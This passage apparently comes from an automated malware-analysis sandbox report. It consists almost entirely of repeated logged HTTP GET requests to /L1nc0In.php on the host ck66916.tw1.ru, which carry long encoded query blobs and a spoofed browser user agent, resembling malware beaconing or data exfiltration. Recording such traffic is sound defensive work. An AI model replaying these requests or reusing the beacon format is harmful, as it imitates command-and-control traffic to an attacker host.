=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1E